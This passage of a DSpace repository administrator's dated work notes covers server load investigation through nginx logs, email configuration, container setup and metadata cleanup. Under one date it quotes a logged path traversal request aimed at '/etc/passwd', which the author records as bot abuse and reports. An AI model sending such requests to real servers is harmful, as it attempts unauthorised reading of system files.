+</ul>
+<pre tabindex="0"><code>$ dspace metadata-import -f /tmp/2019-02-06-CTA-multiple-subjects.csv
+</code></pre><ul>
+<li>Another day, another alert about high load on CGSpace (linode18) from Linode</li>
+<li>This time the load average was 370% and the top ten IPs before, during, and after that time were:</li>
+</ul>
+<pre tabindex="0"><code># zcat --force /var/log/nginx/*.log /var/log/nginx/*.log.1 | grep -E &#34;06/Feb/2019:0(5|6|7|8|9)&#34; | awk &#39;{print $1}&#39; | sort | uniq -c | sort -n | tail -n 10
+    689 35.237.175.180
+   1236 5.9.6.51
+   1305 34.218.226.147
+   1580 66.249.66.219
+   1939 50.116.102.77
+   2313 108.212.105.35
+   4666 205.186.128.185
+   4666 70.32.83.92
+   4950 85.25.237.71
+   5158 45.5.186.2
+</code></pre><ul>
+<li>Looking closer at the top users, I see <code>45.5.186.2</code> is in Brazil and was making over 100 requests per minute to the REST API:</li>
+</ul>
+<pre tabindex="0"><code># zcat --force /var/log/nginx/rest.log /var/log/nginx/rest.log.1 | grep 45.5.186.2 | grep -o -E &#39;06/Feb/2019:0[0-9]:[0-9][0-9]&#39; | uniq -c | sort -n | tail -n 10
+    118 06/Feb/2019:05:46
+    119 06/Feb/2019:05:37
+    119 06/Feb/2019:05:47
+    120 06/Feb/2019:05:43
+    120 06/Feb/2019:05:44
+    121 06/Feb/2019:05:38
+    122 06/Feb/2019:05:39
+    125 06/Feb/2019:05:42
+    126 06/Feb/2019:05:40
+    126 06/Feb/2019:05:41
+</code></pre><ul>
+<li>I was thinking of rate limiting those because I assumed most of them would be errors, but actually most are HTTP 200 OK!</li>
+</ul>
+<pre tabindex="0"><code># zcat --force /var/log/nginx/*.log /var/log/nginx/*.log.1 | grep -E &#39;06/Feb/2019&#39; | grep 45.5.186.2 | awk &#39;{print $9}&#39; | sort | uniq -c
+  10411 200
+      1 301
+      7 302
+      3 404
+     18 499
+      2 500
+</code></pre><ul>
+<li>I should probably start looking at the top IPs for web (XMLUI) and for API (REST and OAI) separately:</li>
+</ul>
+<pre tabindex="0"><code># zcat --force /var/log/nginx/{access,error,library-access}.log /var/log/nginx/{access,error,library-access}.log.1 | grep -E &#34;06/Feb/2019:0(5|6|7|8|9)&#34; | awk &#39;{print $1}&#39; | sort | uniq -c | sort -n | tail -n 10
+    328 220.247.212.35
+    372 66.249.66.221
+    380 207.46.13.2
+    519 2a01:4f8:140:3192::2
+    572 5.143.231.8
+    689 35.237.175.180
+    771 108.212.105.35
+   1236 5.9.6.51
+   1554 66.249.66.219
+   4942 85.25.237.71
+# zcat --force /var/log/nginx/{oai,rest,statistics}.log /var/log/nginx/{oai,rest,statistics}.log.1 | grep -E &#34;06/Feb/2019:0(5|6|7|8|9)&#34; | awk &#39;{print $1}&#39; | sort | uniq -c | sort -n | tail -n 10
+     10 66.249.66.221
+     26 66.249.66.219
+     69 5.143.231.8
+    340 45.5.184.72
+   1040 34.218.226.147
+   1542 108.212.105.35
+   1937 50.116.102.77
+   4661 205.186.128.185
+   4661 70.32.83.92
+   5102 45.5.186.2
+</code></pre><h2 id="2019-02-07">2019-02-07</h2>
+<ul>
+<li>Linode sent an alert last night that the load on CGSpace (linode18) was over 300%</li>
+<li>Here are the top IPs in the web server and API logs before, during, and after that time, respectively:</li>
+</ul>
+<pre tabindex="0"><code># zcat --force /var/log/nginx/{oai,rest,statistics}.log /var/log/nginx/{oai,rest,statistics}.log.1 | grep -E &#34;06/Feb/2019:(17|18|19|20|23)&#34; | awk &#39;{print $1}&#39; | sort | uniq -c | sort -n | tail -n 10
+      5 66.249.66.209
+      6 2a01:4f8:210:51ef::2
+      6 40.77.167.75
+      9 104.198.9.108
+      9 157.55.39.192
+     10 157.55.39.244
+     12 66.249.66.221
+     20 95.108.181.88
+     27 66.249.66.219
+   2381 45.5.186.2
+# zcat --force /var/log/nginx/{access,error,library-access}.log /var/log/nginx/{access,error,library-access}.log.1 | grep -E &#34;06/Feb/2019:(17|18|19|20|23)&#34; | awk &#39;{print $1}&#39; | sort | uniq -c | sort -n | tail -n 10
+    455 45.5.186.2
+    506 40.77.167.75
+    559 54.70.40.11
+    825 157.55.39.244
+    871 2a01:4f8:140:3192::2
+    938 157.55.39.192
+   1058 85.25.237.71
+   1416 5.9.6.51
+   1606 66.249.66.219
+   1718 35.237.175.180
+</code></pre><ul>
+<li>Then again this morning another alert:</li>
+</ul>
+<pre tabindex="0"><code># zcat --force /var/log/nginx/{oai,rest,statistics}.log /var/log/nginx/{oai,rest,statistics}.log.1 | grep -E &#34;07/Feb/2019:0(5|6|7|8|9)&#34; | awk &#39;{print $1}&#39; | sort | uniq -c | sort -n | tail -n 10
+      5 66.249.66.223
+      8 104.198.9.108
+     13 110.54.160.222
+     24 66.249.66.219
+     25 175.158.217.98
+    214 34.218.226.147
+    346 45.5.184.72
+   4529 45.5.186.2
+   4661 205.186.128.185
+   4661 70.32.83.92
+# zcat --force /var/log/nginx/{access,error,library-access}.log /var/log/nginx/{access,error,library-access}.log.1 | grep -E &#34;07/Feb/2019:0(5|6|7|8|9)&#34; | awk &#39;{print $1}&#39; | sort | uniq -c | sort -n | tail -n 10
+    145 157.55.39.237
+    154 66.249.66.221
+    214 34.218.226.147
+    261 35.237.175.180
+    273 2a01:4f8:140:3192::2
+    300 169.48.66.92
+    487 5.143.231.39
+    766 5.9.6.51
+    771 85.25.237.71
+    848 66.249.66.219
+</code></pre><ul>
+<li>So it seems that the load issue comes from the REST API, not the XMLUI</li>
+<li>I could probably rate limit the REST API, or maybe just keep increasing the alert threshold so I don&rsquo;t get alert spam (this is probably the correct approach because it seems like the REST API can keep up with the requests and is returning HTTP 200 status as far as I can tell)</li>
+<li>Bosede from IITA sent a message that a colleague is having problems submitting to some collections in their community:</li>
+</ul>
+<pre tabindex="0"><code>Authorization denied for action WORKFLOW_STEP_1 on COLLECTION:1056 by user 1759
+</code></pre><ul>
+<li>Collection 1056 appears to be <a href="https://cgspace.cgiar.org/handle/10568/68741">IITA Posters and Presentations</a> and I see that its workflow step 1 (Accept/Reject) is empty:</li>
+</ul>
+<p><img src="/cgspace-notes/2019/02/iita-workflow-step1-empty.png" alt="IITA Posters and Presentations workflow step 1 empty"></p>
+<ul>
+<li>IITA editors or approvers should be added to that step (though I&rsquo;m curious why nobody is in that group currently)</li>
+<li>Abenet says we are not using the &ldquo;Accept/Reject&rdquo; step so this group should be deleted</li>
+<li>Bizuwork asked about the &ldquo;DSpace Submission Approved and Archived&rdquo; emails that stopped working last month</li>
+<li>I tried the <code>test-email</code> command on DSpace and it indeed is not working:</li>
+</ul>
+<pre tabindex="0"><code>$ dspace test-email
+
+About to send test email:
+ - To: aorth@mjanja.ch
+ - Subject: DSpace test email
+ - Server: smtp.serv.cgnet.com
+
+Error sending email:
+ - Error: javax.mail.MessagingException: Could not connect to SMTP host: smtp.serv.cgnet.com, port: 25;
+  nested exception is:
+        java.net.ConnectException: Connection refused (Connection refused)
+
+Please see the DSpace documentation for assistance.
+</code></pre><ul>
+<li>I can&rsquo;t connect to TCP port 25 on that server so I sent a mail to CGNET support to ask what&rsquo;s up</li>
+<li>CGNET said these servers were discontinued in 2018-01 and that I should use <a href="https://docs.microsoft.com/en-us/exchange/mail-flow-best-practices/how-to-set-up-a-multifunction-device-or-application-to-send-email-using-office-3">Office 365</a></li>
+</ul>
+<h2 id="2019-02-08">2019-02-08</h2>
+<ul>
+<li>I re-configured CGSpace to use the email/password for cgspace-support, but I get this error when I try the <code>test-email</code> script:</li>
+</ul>
+<pre tabindex="0"><code>Error sending email:
+ - Error: com.sun.mail.smtp.SMTPSendFailedException: 530 5.7.57 SMTP; Client was not authenticated to send anonymous mail during MAIL FROM [AM6PR10CA0028.EURPRD10.PROD.OUTLOOK.COM]
+</code></pre><ul>
+<li>I tried to log into Outlook 365 with the credentials but I think the ones I have must be wrong, so I will ask ICT to reset the password</li>
+</ul>
+<h2 id="2019-02-09">2019-02-09</h2>
+<ul>
+<li>Linode sent alerts about CPU load yesterday morning, yesterday night, and this morning! All over 300% CPU load!</li>
+<li>This is just for this morning:</li>
+</ul>
+<pre tabindex="0"><code># zcat --force /var/log/nginx/{access,error,library-access}.log /var/log/nginx/{access,error,library-access}.log.1 | grep -E &#34;09/Feb/2019:(07|08|09|10|11)&#34; | awk &#39;{print $1}&#39; | sort | uniq -c | sort -n | tail -n 10
+    289 35.237.175.180
+    290 66.249.66.221
+    296 18.195.78.144
+    312 207.46.13.201
+    393 207.46.13.64
+    526 2a01:4f8:140:3192::2
+    580 151.80.203.180
+    742 5.143.231.38
+   1046 5.9.6.51
+   1331 66.249.66.219
+# zcat --force /var/log/nginx/{oai,rest,statistics}.log /var/log/nginx/{oai,rest,statistics}.log.1 | grep -E &#34;09/Feb/2019:(07|08|09|10|11)&#34; | awk &#39;{print $1}&#39; | sort | uniq -c | sort -n | tail -n 10
+      4 66.249.83.30
+      5 49.149.10.16
+      8 207.46.13.64
+      9 207.46.13.201
+     11 105.63.86.154
+     11 66.249.66.221
+     31 66.249.66.219
+    297 2001:41d0:d:1990::
+    908 34.218.226.147
+   1947 50.116.102.77
+</code></pre><ul>
+<li>I know 66.249.66.219 is Google, 5.9.6.51 is MegaIndex, and 5.143.231.38 is SputnikBot</li>
+<li>Ooh, but 151.80.203.180 is some malicious bot making requests for <code>/etc/passwd</code> like this:</li>
+</ul>
+<pre tabindex="0"><code>/bitstream/handle/10568/68981/Identifying%20benefit%20flows%20studies%20on%20the%20potential%20monetary%20and%20non%20monetary%20benefits%20arising%20from%20the%20International%20Treaty%20on%20Plant%20Genetic_1671.pdf?sequence=1&amp;amp;isAllowed=../etc/passwd
+</code></pre><ul>
+<li>151.80.203.180 is on OVH so I sent a message to their abuse email&hellip;</li>
+</ul>
+<h2 id="2019-02-10">2019-02-10</h2>
+<ul>
+<li>Linode sent another alert about CGSpace (linode18) CPU load this morning, here are the top IPs in the web server XMLUI and API logs before, during, and after that time:</li>
+</ul>
+<pre tabindex="0"><code># zcat --force /var/log/nginx/{access,error,library-access}.log /var/log/nginx/{access,error,library-access}.log.1 | grep -E &#34;10/Feb/2019:0(5|6|7|8|9)&#34; | awk &#39;{print $1}&#39; | sort | uniq -c | sort -n | tail -n 10
+    232 18.195.78.144
+    238 35.237.175.180
+    281 66.249.66.221
+    314 151.80.203.180
+    319 34.218.226.147
+    326 40.77.167.178
+    352 157.55.39.149
+    444 2a01:4f8:140:3192::2
+   1171 5.9.6.51
+   1196 66.249.66.219
+# zcat --force /var/log/nginx/{oai,rest,statistics}.log /var/log/nginx/{oai,rest,statistics}.log.1 | grep -E &#34;10/Feb/2019:0(5|6|7|8|9)&#34; | awk &#39;{print $1}&#39; | sort | uniq -c | sort -n | tail -n 10
+      6 112.203.241.69
+      7 157.55.39.149
+      9 40.77.167.178
+     15 66.249.66.219
+    368 45.5.184.72
+    432 50.116.102.77
+    971 34.218.226.147
+   4403 45.5.186.2
+   4668 205.186.128.185
+   4668 70.32.83.92
+</code></pre><ul>
+<li>Another interesting thing might be the total number of requests for web and API services during that time:</li>
+</ul>
+<pre tabindex="0"><code># zcat --force /var/log/nginx/{access,error,library-access}.log /var/log/nginx/{access,error,library-access}.log.1 | grep -cE &#34;10/Feb/2019:0(5|6|7|8|9)&#34;
+16333
+# zcat --force /var/log/nginx/{oai,rest,statistics}.log /var/log/nginx/{oai,rest,statistics}.log.1 | grep -cE &#34;10/Feb/2019:0(5|6|7|8|9)&#34;
+15964
+</code></pre><ul>
+<li>Also, the number of unique IPs served during that time:</li>
+</ul>
+<pre tabindex="0"><code># zcat --force /var/log/nginx/{access,error,library-access}.log /var/log/nginx/{access,error,library-access}.log.1 | grep -E &#34;10/Feb/2019:0(5|6|7|8|9)&#34; | awk &#39;{print $1}&#39; | sort | uniq | wc -l
+1622
+# zcat --force /var/log/nginx/{oai,rest,statistics}.log /var/log/nginx/{oai,rest,statistics}.log.1 | grep -E &#34;10/Feb/2019:0(5|6|7|8|9)&#34; | awk &#39;{print $1}&#39; | sort | uniq | wc -l
+95
+</code></pre><ul>
+<li>It&rsquo;s very clear to me now that the API requests are the heaviest!</li>
+<li>I think I need to increase the Linode alert threshold from 300 to 350% now so I stop getting some of these alerts—it&rsquo;s becoming a bit of <em>the boy who cried wolf</em> because it alerts like clockwork twice per day!</li>
+<li>Add my Python- and shell-based metadata workflow helper scripts as well as the environment settings for pipenv to our DSpace repository (<a href="https://github.com/ilri/DSpace/pull/408">#408</a>) so I can track changes and distribute them more formally instead of just keeping them <a href="https://github.com/ilri/DSpace/wiki/Scripts">collected on the wiki</a></li>
+<li>Started adding IITA research theme (<code>cg.identifier.iitatheme</code>) to CGSpace
+<ul>
+<li>I&rsquo;m still waiting for feedback from IITA whether they actually want to use &ldquo;SOCIAL SCIENCE &amp; AGRIC BUSINESS&rdquo; because it is listed as <a href="http://www.iita.org/project-discipline/social-science-and-agribusiness/">&ldquo;Social Science and Agribusiness&rdquo;</a> on their website</li>
+<li>Also, I think they want to do some mappings of items with existing subjects to these new themes</li>
+</ul>
+</li>
+<li>Update ILRI author name style in the controlled vocabulary (Domelevo Entfellner, Jean-Baka) (<a href="https://github.com/ilri/DSpace/pull/409">#409</a>)
+<ul>
+<li>I&rsquo;m still waiting to hear from Bizuwork whether we&rsquo;ll batch update all existing items with the old name style</li>
+<li>No, there is only one entry and Bizu already fixed it</li>
+</ul>
+</li>
+<li>Last week Hector Tobon from CCAFS asked me about the Creative Commons 3.0 Intergovernmental Organizations (IGO) license because it is not in the list of SPDX licenses
+<ul>
+<li>Today I made <a href="http://13.57.134.254/app/license_requests/15/">a request</a> to the <a href="https://github.com/spdx/license-list-XML/blob/master/CONTRIBUTING.md">SPDX using their web form</a> to include this <a href="https://wiki.creativecommons.org/wiki/Intergovernmental_Organizations">class of Creative Commons licenses</a></li>
+</ul>
+</li>
+<li>Testing the <code>mail.server.disabled</code> property that I noticed in <code>dspace.cfg</code> recently
+<ul>
+<li>Setting it to true results in the following message when I try the <code>dspace test-email</code> helper on DSpace Test:</li>
+</ul>
+</li>
+</ul>
+<pre tabindex="0"><code>Error sending email:
+ - Error: cannot test email because mail.server.disabled is set to true
+</code></pre><ul>
+<li>I&rsquo;m not sure why I didn&rsquo;t know about this configuration option before, and always maintained multiple configurations for development and production
+<ul>
+<li>I will modify the <a href="https://github.com/ilri/rmg-ansible-public">Ansible DSpace role</a> to use this in its <code>build.properties</code> template</li>
+</ul>
+</li>
+<li>I updated my local Sonatype nexus Docker image and had an issue with the volume for some reason so I decided to just start from scratch:</li>
+</ul>
+<pre tabindex="0"><code># docker rm nexus
+# docker pull sonatype/nexus3
+# mkdir -p /home/aorth/.local/lib/containers/volumes/nexus_data
+# chown 200:200 /home/aorth/.local/lib/containers/volumes/nexus_data
+# docker run --name nexus --network dspace-build -d -v /home/aorth/.local/lib/containers/volumes/nexus_data:/nexus-data -p 8081:8081 sonatype/nexus3
+</code></pre><ul>
+<li>For some reason my <code>mvn package</code> for DSpace is not working now&hellip; I might go back to <a href="https://mjanja.ch/2018/02/cache-maven-artifacts-with-artifactory/">using Artifactory for caching</a> instead:</li>
+</ul>
+<pre tabindex="0"><code># docker pull docker.bintray.io/jfrog/artifactory-oss:latest
+# mkdir -p /home/aorth/.local/lib/containers/volumes/artifactory5_data
+# chown 1030 /home/aorth/.local/lib/containers/volumes/artifactory5_data
+# docker run --name artifactory --network dspace-build -d -v /home/aorth/.local/lib/containers/volumes/artifactory5_data:/var/opt/jfrog/artifactory -p 8081:8081 docker.bintray.io/jfrog/artifactory-oss
+</code></pre><h2 id="2019-02-11">2019-02-11</h2>
+<ul>
+<li>Bosede from IITA said we can use &ldquo;SOCIAL SCIENCE &amp; AGRIBUSINESS&rdquo; in their new IITA theme field to be consistent with other places they are using it</li>
+<li>Run all system updates on DSpace Test (linode19) and reboot it</li>
+</ul>
+<h2 id="2019-02-12">2019-02-12</h2>
+<ul>
+<li>I notice that <a href="https://jira.duraspace.org/browse/DS-3052">DSpace 6 has included a new JAR-based PDF thumbnailer based on PDFBox</a>, I wonder how good its thumbnails are and how it handles CMYK PDFs</li>
+<li>On a similar note, I wonder if we could use the performance-focused <a href="https://libvips.github.io/libvips/">libvps</a> and the third-party <a href="https://github.com/codecitizen/jlibvips/">jlibvips Java library</a> in DSpace</li>
+<li>Testing the <code>vipsthumbnail</code> command line tool with <a href="https://cgspace.cgiar.org/handle/10568/51999">this CGSpace item that uses CMYK</a>:</li>
+</ul>
+<pre tabindex="0"><code>$ vipsthumbnail alc_contrastes_desafios.pdf -s 300 -o &#39;%s.jpg[Q=92,optimize_coding,strip]&#39;
+</code></pre><ul>
+<li>(DSpace 5 appears to use JPEG 92 quality so I do the same)</li>
+<li>Thinking about making &ldquo;top items&rdquo; endpoints in my <a href="https://github.com/ilri/dspace-statistics-api">dspace-statistics-api</a></li>
+<li>I could use the following SQL queries very easily to get the top items by views or downloads:</li>
+</ul>
+<pre tabindex="0"><code>dspacestatistics=# SELECT * FROM items WHERE views &gt; 0 ORDER BY views DESC LIMIT 10;
+dspacestatistics=# SELECT * FROM items WHERE downloads &gt; 0 ORDER BY downloads DESC LIMIT 10;
+</code></pre><ul>
+<li>I&rsquo;d have to think about what to make the REST API endpoints, perhaps: <code>/statistics/top/items?limit=10</code></li>
+<li>But how do I do top items by views / downloads separately?</li>
+<li>I re-deployed DSpace 6.3 locally to test the PDFBox thumbnails, especially to see if they handle CMYK files properly
+<ul>
+<li>The quality is JPEG 75 and I don&rsquo;t see a way to set the thumbnail dimensions, but the resulting image is indeed sRGB:</li>
+</ul>
+</li>
+</ul>
+<pre tabindex="0"><code>$ identify -verbose alc_contrastes_desafios.pdf.jpg
+...
+  Colorspace: sRGB
+</code></pre><ul>
+<li>I will read the PDFBox thumbnailer documentation to see if I can change the size and quality</li>
+</ul>
+<h2 id="2019-02-13">2019-02-13</h2>
+<ul>
+<li>ILRI ICT reset the password for the CGSpace mail account, but I still can&rsquo;t get it to send mail from DSpace&rsquo;s <code>test-email</code> utility</li>
+<li>I even added extra mail properties to <code>dspace.cfg</code> as suggested by someone on the dspace-tech mailing list:</li>
+</ul>
+<pre tabindex="0"><code>mail.extraproperties = mail.smtp.starttls.required = true, mail.smtp.auth=true
+</code></pre><ul>
+<li>But the result is still:</li>
+</ul>
+<pre tabindex="0"><code>Error sending email:
+ - Error: com.sun.mail.smtp.SMTPSendFailedException: 530 5.7.57 SMTP; Client was not authenticated to send anonymous mail during MAIL FROM [AM6PR06CA0001.eurprd06.prod.outlook.com]
+</code></pre><ul>
+<li>I tried to log into the Outlook 365 web mail and it doesn&rsquo;t work so I&rsquo;ve emailed ILRI ICT again</li>
+<li>After reading the <a href="https://javaee.github.io/javamail/FAQ#commonmistakes">common mistakes in the JavaMail FAQ</a> I reconfigured the extra properties in DSpace&rsquo;s mail configuration to be simply:</li>
+</ul>
+<pre tabindex="0"><code>mail.extraproperties = mail.smtp.starttls.enable=true
+</code></pre><ul>
+<li>&hellip; and then I was able to send a mail using my personal account where I know the credentials work</li>
+<li>The CGSpace account still gets this error message:</li>
+</ul>
+<pre tabindex="0"><code>Error sending email:
+ - Error: javax.mail.AuthenticationFailedException
+</code></pre><ul>
+<li>I updated the <a href="https://github.com/ilri/DSpace/pull/410">DSpace SMTP settings in <code>dspace.cfg</code></a> as well as the <a href="https://github.com/ilri/rmg-ansible-public/commit/ab5fe4d10e16413cd04ffb1bc3179dc970d6d47c">variables in the DSpace role of the Ansible infrastructure scripts</a></li>
+<li>Thierry from CTA is having issues with his account on DSpace Test, and there is no admin password reset function on DSpace (only via email, which is disabled on DSpace Test), so I have to delete and re-create his account:</li>
+</ul>
+<pre tabindex="0"><code>$ dspace user --delete --email blah@cta.int
+$ dspace user --add --givenname Thierry --surname Lewyllie --email blah@cta.int --password &#39;blah&#39;
+</code></pre><ul>
+<li>On this note, I saw a thread on the dspace-tech mailing list that says this functionality exists if you enable <code>webui.user.assumelogin = true</code></li>
+<li>I will enable this on CGSpace (<a href="https://github.com/ilri/DSpace/pull/411">#411</a>)</li>
+<li>Test re-creating my local PostgreSQL and Artifactory containers with podman instead of Docker (using the volumes from my old Docker containers though):</li>
+</ul>
+<pre tabindex="0"><code># podman pull postgres:9.6-alpine
+# podman run --name dspacedb -v /home/aorth/.local/lib/containers/volumes/dspacedb_data:/var/lib/postgresql/data -e POSTGRES_PASSWORD=postgres -p 5432:5432 -d postgres:9.6-alpine
+# podman pull docker.bintray.io/jfrog/artifactory-oss
+# podman run --name artifactory -d -v /home/aorth/.local/lib/containers/volumes/artifactory5_data:/var/opt/jfrog/artifactory -p 8081:8081 docker.bintray.io/jfrog/artifactory-oss
+</code></pre><ul>
+<li>Totally works&hellip; awesome!</li>
+<li>Then I tried with rootless containers by creating the subuid and subgid mappings for aorth:</li>
+</ul>
+<pre tabindex="0"><code>$ sudo touch /etc/subuid /etc/subgid
+$ usermod --add-subuids 10000-75535 aorth
+$ usermod --add-subgids 10000-75535 aorth
+$ sudo sysctl kernel.unprivileged_userns_clone=1
+$ podman pull postgres:9.6-alpine
+$ podman run --name dspacedb -v /home/aorth/.local/lib/containers/volumes/dspacedb_data:/var/lib/postgresql/data -e POSTGRES_PASSWORD=postgres -p 5432:5432 -d postgres:9.6-alpine
+</code></pre><ul>
+<li>Which totally works, but Podman&rsquo;s rootless support doesn&rsquo;t work with port mappings yet&hellip;</li>
+<li>Deploy the Tomcat-7-from-tarball branch on CGSpace (linode18), but first stop the Ubuntu Tomcat 7 and do some basic prep before running the Ansible playbook:</li>
+</ul>
+<pre tabindex="0"><code># systemctl stop tomcat7
+# apt remove tomcat7 tomcat7-admin
+# useradd -m -r -s /bin/bash dspace
+# mv /usr/share/tomcat7/.m2 /home/dspace
+# mv /usr/share/tomcat7/src /home/dspace
+# chown -R dspace:dspace /home/dspace
+# chown -R dspace:dspace /home/cgspace.cgiar.org
+# dpkg -P tomcat7-admin tomcat7-common
+</code></pre><ul>
+<li>After running the playbook CGSpace came back up, but I had an issue with some Solr cores not being loaded (similar to last month) and this was in the Solr log:</li>
+</ul>
+<pre tabindex="0"><code>2019-02-14 18:17:31,304 ERROR org.apache.solr.core.SolrCore @ org.apache.solr.common.SolrException: Error CREATEing SolrCore &#39;statistics-2018&#39;: Unable to create core [statistics-2018] Caused by: Lock obtain timed out: NativeFSLock@/home/cgspace.cgiar.org/solr/statistics-2018/data/index/write.lock
+</code></pre><ul>
+<li>The issue last month was address space, which is now set as <code>LimitAS=infinity</code> in <code>tomcat7.service</code>&hellip;</li>
+<li>I re-ran the Ansible playbook to make sure all configs etc were the, then rebooted the server</li>
+<li>Still the error persists after reboot</li>
+<li>I will try to stop Tomcat and then remove the locks manually:</li>
+</ul>
+<pre tabindex="0"><code># find /home/cgspace.cgiar.org/solr/ -iname &#34;write.lock&#34; -delete
+</code></pre><ul>
+<li>After restarting Tomcat the usage statistics are back</li>
+<li>Interestingly, many of the locks were from last month, last year, and even 2015! I&rsquo;m pretty sure that&rsquo;s not supposed to be how locks work&hellip;</li>
+<li>Help Sarah Kasyoka finish an item submission that she was having issues with due to the file size</li>
+<li>I increased the nginx upload limit, but she said she was having problems and couldn&rsquo;t really tell me why</li>
+<li>I logged in as her and completed the submission with no problems&hellip;</li>
+</ul>
+<h2 id="2019-02-15">2019-02-15</h2>
+<ul>
+<li>Tomcat was killed around 3AM by the kernel&rsquo;s OOM killer according to <code>dmesg</code>:</li>
+</ul>
+<pre tabindex="0"><code>[Fri Feb 15 03:10:42 2019] Out of memory: Kill process 12027 (java) score 670 or sacrifice child
+[Fri Feb 15 03:10:42 2019] Killed process 12027 (java) total-vm:14108048kB, anon-rss:5450284kB, file-rss:0kB, shmem-rss:0kB
+[Fri Feb 15 03:10:43 2019] oom_reaper: reaped process 12027 (java), now anon-rss:0kB, file-rss:0kB, shmem-rss:0kB
+</code></pre><ul>
+<li>The <code>tomcat7</code> service shows:</li>
+</ul>
+<pre tabindex="0"><code>Feb 15 03:10:44 linode19 systemd[1]: tomcat7.service: Main process exited, code=killed, status=9/KILL
+</code></pre><ul>
+<li>I suspect it was related to the media-filter cron job that runs at 3AM but I don&rsquo;t see anything particular in the log files</li>
+<li>I want to try to normalize the <code>text_lang</code> values to make working with metadata easier</li>
+<li>We currently have a bunch of weird values that DSpace uses like <code>NULL</code>, <code>en_US</code>, and <code>en</code> and others that have been entered manually by editors:</li>
+</ul>
+<pre tabindex="0"><code>dspace=# SELECT DISTINCT text_lang, count(*) FROM metadatavalue WHERE resource_type_id=2 GROUP BY text_lang ORDER BY count DESC;
+ text_lang |  count
+-----------+---------
+           | 1069539
+ en_US     |  577110
+           |  334768
+ en        |  133501
+ es        |      12
+ *         |      11
+ es_ES     |       2
+ fr        |       2
+ spa       |       2
+ E.        |       1
+ ethnob    |       1
+</code></pre><ul>
+<li>The majority are <code>NULL</code>, <code>en_US</code>, the blank string, and <code>en</code>—the rest are not enough to be significant</li>
+<li>Theoretically this field could help if you wanted to search for Spanish-language fields in the API or something, but even for the English fields there are two different values (and those are from DSpace itself)!</li>
+<li>I&rsquo;m going to normalized these to <code>NULL</code> at least on DSpace Test for now:</li>
+</ul>
+<pre tabindex="0"><code>dspace=# UPDATE metadatavalue SET text_lang = NULL WHERE resource_type_id=2 AND text_lang IS NOT NULL;
+UPDATE 1045410
+</code></pre><ul>
+<li>I started proofing IITA&rsquo;s 2019-01 records that Sisay uploaded this week
+<ul>
+<li>There were 259 records in IITA&rsquo;s original spreadsheet, but there are 276 in Sisay&rsquo;s collection</li>
+<li>Also, I found that there are at least twenty duplicates in these records that we will need to address</li>
+</ul>
+</li>
+<li>ILRI ICT fixed the password for the CGSpace support email account and I tested it on Outlook 365 web and DSpace and it works</li>
+<li>Re-create my local PostgreSQL container to for new PostgreSQL version and to use podman&rsquo;s volumes:</li>
+</ul>
+<pre tabindex="0"><code>$ podman pull postgres:9.6-alpine
+$ podman volume create dspacedb_data
+$ podman run --name dspacedb -v dspacedb_data:/var/lib/postgresql/data -e POSTGRES_PASSWORD=postgres -p 5432:5432 -d postgres:9.6-alpine
+$ createuser -h localhost -U postgres --pwprompt dspacetest
+$ createdb -h localhost -U postgres -O dspacetest --encoding=UNICODE dspacetest
+$ psql -h localhost -U postgres dspacetest -c &#39;alter user dspacetest superuser;&#39;
+$ pg_restore -h localhost -U postgres -d dspacetest -O --role=dspacetest -h localhost dspace_2019-02-11.backup
+$ psql -h localhost -U postgres -f ~/src/git/DSpace/dspace/etc/postgres/update-sequences.sql dspacetest
+$ psql -h localhost -U postgres dspacetest -c &#39;alter user dspacetest nosuperuser;&#39;
+</code></pre><ul>
+<li>And it&rsquo;s all running without root!</li>
+<li>Then re-create my Artifactory container as well, taking into account ulimit open file requirements by Artifactory as well as the user limitations caused by rootless subuid mappings:</li>
+</ul>
+<pre tabindex="0"><code>$ podman volume create artifactory_data
+artifactory_data
+$ podman create --ulimit nofile=32000:32000 --name artifactory -v artifactory_data:/var/opt/jfrog/artifactory -p 8081:8081 docker.bintray.io/jfrog/artifactory-oss
+$ buildah unshare
+$ chown -R 1030:1030 ~/.local/share/containers/storage/volumes/artifactory_data
+$ exit
+$ podman start artifactory
+</code></pre><ul>
+<li>More on the <a href="https://podman.io/blogs/2018/10/03/podman-remove-content-homedir.html">subuid permissions issue with rootless containers here</a></li>
+</ul>
+<h2 id="2019-02-17">2019-02-17</h2>
+<ul>
+<li>I ran DSpace&rsquo;s cleanup task on CGSpace (linode18) and there were errors:</li>
+</ul>
+<pre tabindex="0"><code>$ dspace cleanup -v
+Error: ERROR: update or delete on table &#34;bitstream&#34; violates foreign key constraint &#34;bundle_primary_bitstream_id_fkey&#34; on table &#34;bundle&#34;
+  Detail: Key (bitstream_id)=(162844) is still referenced from table &#34;bundle&#34;.
+</code></pre><ul>
+<li>The solution is, as always:</li>
+</ul>
+<pre tabindex="0"><code>$ psql dspace -c &#39;update bundle set primary_bitstream_id=NULL where primary_bitstream_id in (162844);&#39;
+UPDATE 1
+</code></pre><ul>
+<li>I merged the Atmire Metadata Quality Module (MQM) changes to the <code>5_x-prod</code> branch and deployed it on CGSpace (<a href="https://github.com/ilri/DSpace/pull/407">#407</a>)</li>
+<li>Then I ran all system updates on CGSpace server and rebooted it</li>
+</ul>
+<h2 id="2019-02-18">2019-02-18</h2>
+<ul>
+<li>Jesus fucking Christ, Linode sent an alert that CGSpace (linode18) was using 421% CPU for a few hours this afternoon (server time):</li>
+<li>There seems to have been a lot of activity in XMLUI:</li>
+</ul>
+<pre tabindex="0"><code># zcat --force /var/log/nginx/{access,error,library-access}.log /var/log/nginx/{access,error,library-access}.log.1 | grep -E &#34;18/Feb/2019:1(2|3|4|5|6)&#34; | awk &#39;{print $1}&#39; | sort | uniq -c | sort -n | tail -n 10
+   1236 18.212.208.240
+   1276 54.164.83.99
+   1277 3.83.14.11
+   1282 3.80.196.188
+   1296 3.84.172.18
+   1299 100.24.48.177
+   1299 34.230.15.139
+   1327 52.54.252.47
+   1477 5.9.6.51
+   1861 94.71.244.172
+# zcat --force /var/log/nginx/{oai,rest,statistics}.log /var/log/nginx/{oai,rest,statistics}.log.1 | grep -E &#34;18/Feb/2019:1(2|3|4|5|6)&#34; | awk &#39;{print $1}&#39; | sort | uniq -c | sort -n | tail -n 10
+      8 42.112.238.64
+      9 121.52.152.3
+      9 157.55.39.50
+     10 110.54.151.102
+     10 194.246.119.6
+     10 66.249.66.221
+     15 190.56.193.94
+     28 66.249.66.219
+     43 34.209.213.122
+    178 50.116.102.77
+# zcat --force /var/log/nginx/{access,error,library-access}.log /var/log/nginx/{access,error,library-access}.log.1 | grep -E &#34;18/Feb/2019:1(2|3|4|5|6)&#34; | awk &#39;{print $1}&#39; | sort | uniq | wc -l
+2727
